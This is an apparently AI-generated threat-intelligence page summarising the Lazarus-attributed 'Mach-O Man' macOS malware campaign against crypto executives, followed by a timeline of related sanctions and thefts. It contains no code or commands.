Mach-O Man Malware Campaign (Lazarus / Chollima)
Summary
Mach-O Man is a four-stage macOS malware kit attributed to North Korea's Lazarus Group (Chollima division), publicly disclosed in April 2026 by researchers at Bitso's Quetzal Team and the ANY.RUN sandbox platform. The campaign uses ClickFix social engineering — delivering fake meeting invitations via Telegram — to trick cryptocurrency and fintech executives into executing a terminal command that deploys a modular toolkit capable of stealing macOS Keychain secrets, browser credentials, session cookies, and crypto wallet extension data. Security researchers have linked the same threat actor cluster to over $575 million stolen from Drift Protocol and KelpDAO in April 2026 alone, and Lazarus Group's cumulative cryptocurrency theft since 2017 is estimated to exceed $7.3 billion.
Connected Entities
1 entities · 10 linked investigations- + 2 more
Timeline(13 events)
2007-01-01
Lazarus Group established by the North Korean government, subordinate to the 110th Research Center, 3rd Bureau of the RGB, according to U.S. Treasury.
U.S. Treasury OFAC Press Release SM7742019-09-13
OFAC designates Lazarus Group, Bluenoroff, and Andariel as SDNs under Executive Order 13722, prohibiting U.S. persons from transacting with them.
U.S. Treasury OFAC2020-03-02
OFAC sanctions two Chinese nationals for laundering cryptocurrency on behalf of Lazarus Group.
U.S. Treasury OFAC2020-08-01
U.S. DOJ files complaint seeking forfeiture of 280 cryptocurrency addresses linked to North Korean exchange hackers, supported by Chainalysis tracing.
Chainalysis Blog2022-05-06
OFAC issues first-ever sanctions on a virtual currency mixer (Tornado Cash) citing its use to launder DPRK-linked proceeds.
U.S. Treasury OFAC2025-01-01
Chainalysis estimates DPRK-linked actors stole $2.02 billion during 2025, a 51% year-over-year increase, per its 2026 crypto crime report.
CryptoTimes / Chainalysis2025-09-01
Alleged start of six-month social engineering operation targeting Drift Protocol, with DPRK-linked operatives attending conferences and building relationships with contributors (approximate date per reporting).
The Hacker News2026-04-01
Drift Protocol exploited for approximately $285–295 million via social engineering and durable nonce manipulation. Attributed with medium confidence to UNC4736 (Citrine Sleet / Golden Chollima), a DPRK-linked cluster.
Bloomberg / The Hacker News / TRM Labs2026-04-18
KelpDAO bridge exploited for approximately $290–293 million (116,500 rsETH) via compromised RPC nodes and a single-point-of-failure DVN configuration. LayerZero and Chainalysis attribute the attack to Lazarus Group.
BleepingComputer / Chainalysis / CoinDesk2026-04-21
Researchers at Bitso's Quetzal Team and ANY.RUN (analyst: Mauro Eldritch) publicly disclose the Mach-O Man malware kit, publishing full technical analysis including binary names, IOCs, and four-stage attack chain.
ANY.RUN Cybersecurity Blog2026-04-22
CertiK publishes analysis linking Mach-O Man campaign to Lazarus Group and connecting it to the Drift and KelpDAO exploits. CoinDesk covers the story.
CoinDesk2026-04-22
Arbitrum reportedly freezes $71 million in funds linked to the KelpDAO exploit.
Bitcoin News2026-05-05
Drift Protocol publishes a recovery plan for affected users following the $285–295 million DPRK-linked exploit.
CoinDeskDecision Log
- hash: 69tyXeNe38meFGL6wsrEwJ192xUuw6qJH6VrVy51HaFW
This investigation is cryptographically anchored to the Solana blockchain and source URLs are archived via the Internet Archive.
model: claude-sonnet-4-6
generated: 6/7/2026, 11:05:18 PM
last updated: 6/7/2026, 11:05:29 PM
avoid.net — verified advice for a post-truth world